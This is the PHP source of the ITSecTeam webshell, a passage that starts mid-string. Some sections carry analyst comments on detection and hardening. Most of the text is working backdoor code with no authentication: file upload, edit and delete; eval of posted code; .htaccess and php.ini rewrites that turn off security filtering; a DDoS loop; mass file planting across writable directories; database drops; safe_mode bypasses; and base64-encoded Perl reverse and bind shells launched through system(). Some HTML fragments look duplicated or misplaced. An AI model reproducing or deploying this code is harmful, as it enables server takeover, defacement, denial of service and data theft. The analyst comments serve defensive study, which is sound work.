"; $formg="
"; $nowaddress=''; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} } $picdir='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'; $picfile='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'; $head=' iTSecTeam
 

首页 -- 文件管理 -- 命令执行 -- 反弹shell -- BypasS 命令执行(SF-DF) -- Symlink -- 绕过限制读文件 -- PHP命令 -- 数据库操作 -- 加密转换 -- 邮件使者
服务器信息
-- 本机死机 -- 备份数据库 -- 批量挂马 -- 下载文件 -- DDoS -- 查可写目录 -- Server -- Remove Me -- About

Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
'; $end='

'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'
'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; function alert($text){ echo ""; } if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'


'.$end;exit; }else{alert("Permission Denied !");}}

/**
 * Format a byte count as a short human-readable string.
 *
 * Values of at least 1024 are divided by the matching power of 1024,
 * rounded to two decimals and suffixed with " KB", " MB" or " GB".
 * Smaller values are returned unchanged with a " B" suffix.
 * Callers in this file pass filesize() and disk_*_space() results.
 *
 * @param int|float $size Size in bytes.
 * @return string The formatted size.
 */
function sizee($size) {
    // Thresholds are 1024^3, 1024^2 and 1024, tested from largest to smallest.
    if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
    elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
    elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
    else {$size = $size . " B";}
    return $size;
}

// Analyst note: `do=about` only prints static credit text between $head and
// $end and then exits. The banner and credit strings are fixed text, which
// makes them convenient anchors for content-matching rules when sweeping a
// web root for copies of this script.
if($_REQUEST['do']=='about'){ echo $head."

ITSecTeam, IT Security Research & Penetration Testing Team
Version 2.1
Last Update : 2010/10/10
Coded By : Amin Shokohi(Pejvak)
Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )
首页 Page : http://www.itsecteam.com
Update Notice: ITSecTeam Shell
Forum : http://www.forum.itsecteam.com


 ______  ______  ____                   ______                               
/\__  _\/\__  _\/\  _`\                /\__  _\                              
\/_/\ \/\/_/\ \/\ \,\L\_\     __    ___\/_/\ \/    __     __      ___ ___    
   \ \ \   \ \ \ \/_\__ \   /'__`\ /'___\ \ \ \  /'__`\ /'__`\  /' __` __`\  
    \_\ \__ \ \ \  /\ \L\ \/\  __//\ \__/  \ \ \/\  __//\ \L\.\_/\ \/\ \/\ \ 
    /\_____\ \ \_\ \ `\____\ \____\ \____\  \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
    \/_____/  \/_/  \/_____/\/____/\/____/   \/_/\/____/\/__/\/_/\/_/\/_/\/_/
                                                                             
                                                                             

                                                                        


".$end;exit; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} function download($fileadd,$finame){ $dlfilea=$fileadd.$finame; header("Content-Disposition: attachment; filename=" . $finame); header("Content-Type: application/download"); header("Content-Length: " . filesize($dlfilea)); flush(); $fp = fopen($$dlfilea, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'

To

'.$end;exit; }

// Analyst note: the `byapache` query parameter selects one of three
// configuration overwrites in the script's current working directory.
// Each branch opens the target with mode "w", so any existing file content is
// discarded. None of the branches checks who is making the request.
// Whether the server honours the written files depends on its configuration
// (for Apache, the AllowOverride setting; per-directory php.ini is only read
// by some CGI-style setups) - verify on the affected host.
// Defensive takeaways: keep the web-server account unable to write inside the
// document root, restrict overrides (e.g. `AllowOverride None`), and alert on
// creation or modification of .htaccess / php.ini under served directories.
if ($_GET['byapache']=='ofms'){
    // Rewrites .htaccess with two "... Off" directives. The directive names
    // appear masked in this copy; presumably they target a request-filtering
    // module - confirm against the original sample.
    $fse=fopen(getcwd().$slash.".htaccess","w");
    fwrite($fse,' Sec------Engine Off Sec------ScanPOST Off ');
    fclose($fse);
}elseif ($_GET['byapache']=='bysap'){
    // Rewrites .htaccess to enable symlink following and to change the
    // directory index file name.
    $fse=fopen(getcwd().$slash.".htaccess","w");
    fwrite($fse,'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html');
    fclose($fse);
}elseif ($_GET['byapache']=='sfadf'){
    // Writes a local php.ini that tries to switch off safe_mode and clear
    // the disable_functions list.
    $fse=fopen(getcwd().$slash."php.ini","w");
    fwrite($fse,'safe_mode=OFF disable_functions=NONE');
    fclose($fse);
}

// `do=apache` renders the form page for the handler above and exits.
if($_GET['do']=="apache"){ echo $head.$formg.$nowaddress.'


'.$end;exit; } if($_GET['do']=="dd0s"){ echo $head.$formg.$nowaddress.'

Address : Time :

'.$end;exit; }

// Analyst note: outbound request generator. When both `urldd0` and `timedd0`
// are present in the query string, each pass of the loop opens the URL taken
// from `urldd0` with fopen(), reads the response to the end and discards it;
// `timedd0` is the value the loop condition compares against.
// Effect for the defender: the compromised host becomes a source of repeated
// HTTP traffic towards a third party, and the PHP worker is tied up while it
// runs.
// Detection: requests carrying the `urldd0` / `timedd0` parameters; bursts of
// outbound connections originating from the web-server account.
// Mitigation: `allow_url_fopen = Off` where remote streams are not needed, and
// egress filtering so web workers cannot reach arbitrary external hosts.
if($_GET['urldd0'] && $_GET['timedd0']){
    for ($id=0;$$id<$_GET['timedd0'];$id++){
        $fp=null;
        $contents=null;
        $fp=fopen($_GET['urldd0'],"rb");
        while (!feof($fp)) { $contents .= fread($fp, 8192); }
        fclose($fp);
    }}

// `do=dlfile` renders the remote-download form and exits.
if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

下载文件!
Address :
Save To :

'.$end;exit; }

/**
 * List the writable sub-directories of a directory.
 *
 * Opens $addres, and for every entry other than "." and ".." that is a
 * directory, records its path when is_writable() reports true. It also calls
 * itself on each sub-directory, but the value returned by that nested call is
 * not used here.
 *
 * Analyst note: this is reconnaissance for locations the web-server account
 * can write to. A writable directory reported here is a place where the
 * account's permissions are broader than serving content requires.
 *
 * @param string $addres Directory to scan (taken from the `affw` POST field
 *                       by the caller in this file).
 * @return array|string  List of ['filename' => path] entries, the string
 *                       "notperm" when the directory cannot be opened, or
 *                       "notfound" when nothing was recorded.
 */
function dirpe($addres){
    // $slash is the path separator defined elsewhere in the script.
    global $slash;
    $idd=0;
    if ($dirhen = @opendir($addres)) {
        while ($file = readdir($dirhen)) {
            // Collapse a doubled separator produced by the concatenation.
            $permdir=str_replace('//','/',$addres.$slash.$file);
            if($file!='.' && $file!='..' && is_dir($permdir)){
                if (is_writable($permdir)) {
                    $dirdata[$idd]['filename']=$permdir;
                    $idd++;
                }
                dirpe($permdir);
            }
        }
        closedir($dirhen);
    } else {
        return ("notperm");
    }
    if ($dirdata){ return $dirdata; }else{ return "notfound"; }
}

/**
 * Write one file, with caller-supplied name and content, into writable
 * sub-directories of a directory.
 *
 * Same traversal as dirpe(); for each writable sub-directory it tries to open
 * `$massname` inside it with mode "w" (replacing any existing file of that
 * name) and writes `$masssource`. Directories where the open succeeded are
 * recorded in the result.
 *
 * Analyst note: name and content come straight from the `massname` and
 * `masssource` POST fields (see the caller in this file). On an affected host
 * the trace is a set of files with the same name and identical content
 * appearing in many directories within a short time window; file-integrity
 * monitoring and a search by name/hash across the web root will surface them.
 * Keeping served directories non-writable for the web-server account removes
 * the precondition.
 *
 * @param string $addres     Directory to scan.
 * @param string $massname   File name to create in each writable directory.
 * @param string $masssource Content written to each file.
 * @return array|string      List of ['filename' => directory] entries,
 *                           "notperm" or "notfound" as in dirpe().
 */
function dirpmass($addres,$massname,$masssource){
    global $slash;
    $idd=0;
    if ($dirhen = @opendir($addres)) {
        while ($file = readdir($dirhen)) {
            $permdir=str_replace('//','/',$addres.$slash.$file);
            if($file!='.' && $file!='..' && is_dir($permdir)){
                if (is_writable($permdir)) {
                    if ($fm=fopen($permdir.$slash.$massname,"w")){
                        fwrite($fm,$masssource);
                        fclose($fm);
                        $dirdata[$idd]['filename']=$permdir;
                    }
                    $idd++;
                }
                dirpmass($permdir);
            }
        }
        closedir($dirhen);
    } else {
        return ("notperm");
    }
    if ($dirdata){ return $dirdata; }else{ return "notfound"; }
}

// `do=perm` renders the form for the writable-directory search and exits.
if($_GET['do']=="perm"){ echo $head.$formp.'

Find All Folder Writeable

'.$end;exit; } if ($_POST['affw']){ $arrfilelist=dirpe($_POST['affw']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.' '.$end;exit; }} if($_GET['do']=="mass"){ echo $head.$formp.'

[批量挂马]


'.$end;exit; } if ($_POST['mffw']){ $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->  File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->  File : To Directory

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.' '.$end;exit; }} if($_POST['adlr'] && $_POST['adsr']){ $url = $_POST['adlr']; $newfname = $_POST['adsr'] . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } alert("File Downloaded Success"); }else{alert("Can Not Open File");} if ($file) { fclose($file); } if ($newf) { fclose($newf); } } if($_GET['do']=="down" and $_GET['type']=='file'){ download($_GET['address'],$_GET['filename']);} if($_GET['do']=="down" and $_GET['type']=='dir'){ class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = 
substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); function get_files_from_folder($directory, $put_into) { global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } $datedl=date("y-m-d"); get_files_from_folder($dlfolder,''); header("Content-Disposition: attachment; filename=" . 
$_GET['dirname']."-".$datedl.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname']."-".$datedl.".zip"; $fd = fopen ($filename, "wb"); $out = fwrite ($fd, $zipfile -> file()); fclose ($fd); } if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO 
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For 反弹shell Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< 反弹shell >>>>>>
Ip Address : Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } function copyf($file1,$file2,$filename){ global $slash; $fpc = fopen($file1, "rb"); $source = ''; while (!feof($fpc)) { $source .= fread($fpc, 8192); } fclose($fpc); $opt = fopen($file2.$slash.$filename, "w"); fwrite($opt, $source); fclose($opt); } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ echo $_REQUEST['address']; copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']); }else{alert("Permission Denied !");}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'

Create File


'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); alert("File Saved !");}else{alert("Permission Denied !");}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); 
$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo "


'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->  File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->  File : To Directory
"; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd
$et
"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i
'; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'


Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File

Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'

'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; }

/**
 * Build a string listing the drive letters that exist on the host.
 *
 * Tests every letter from A to Z with is_dir() on "<letter>:" followed by the
 * global path separator and appends each hit to the result. $adri is assigned
 * but not used inside this function.
 *
 * @return string|null The accumulated list; the variable is never
 *                     initialised, so nothing is set when no letter matches.
 */
function printdrive(){
    global $slash;
    foreach (range("A","Z") as $tempdrive) {
        if (is_dir($tempdrive.":".$slash)){
            $adri=$tempdrive.":".$slash;
            $drivea=$drivea.''.$tempdrive.':'.$slash.' ';
        }
    }
    return $drivea;
}

// Analyst note: the handlers below act directly on request parameters. The
// is_writable() calls are filesystem permission probes only - there is no
// authentication or authorisation step anywhere in this span, so whoever can
// reach the script's URL gets the web-server account's file privileges.
// Request fields seen here (`nameren`, `addressren`, `fedit`, `namefe`,
// `evalsource`, `do=delete`) are usable as indicators in access logs and
// WAF rules; POST bodies are usually not logged, so request-body inspection
// or audit logging is needed to see most of them.

// Rename: moves the path in `addressren` to the path in `nameren`.
if($_POST['nameren'] && $_POST['addressren']){
    if(is_writable($_REQUEST['addressren'])){
        rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
    }else{alert("Permission Denied !");}
}

// Delete: `type=dir` removes a directory tree through deleteDirectory(),
// `type=file` unlinks a single file. Paths are `address` + `filename`.
if($_GET['do']=="delete"){
    if ($_GET['type']=="dir"){
        if(is_writable($_REQUEST['address'])){
            $dir=$_GET['address'].$_GET['filename'];
            deleteDirectory($dir);
            alert("Deleted Successful !");
        }else{alert("Permission Denied !");}
    }elseif($_GET['type']=="file"){
        if(is_writable($_GET['address'].$_GET['filename'])){
            unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
        }else{alert("Permission Denied !");}
    }
}

// Save: writes the entity-decoded `fedit` body to `address`/`namefe`,
// replacing the file (mode "w"). This is how existing application files can
// end up modified; compare served code against a known-good baseline.
if($_POST['fedit'] && $_POST['namefe']){
    if(is_writable($_REQUEST['address'])){
        $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
        fwrite($opensave,html_entity_decode($_POST['fedit']));
        fclose($opensave);alert("File Saved Successful !");
    }else{alert("Permission Denied !");}
}

// Code execution: the `evalsource` POST field is passed to eval() unchanged.
// Note for hardening reviews: eval is a language construct, so listing it in
// disable_functions has no effect; prevention has to come from keeping the
// script off the host (upload controls, integrity monitoring) rather than
// from PHP function restrictions.
if ($_POST['evalsource']){
    eval($_POST['evalsource']);
}

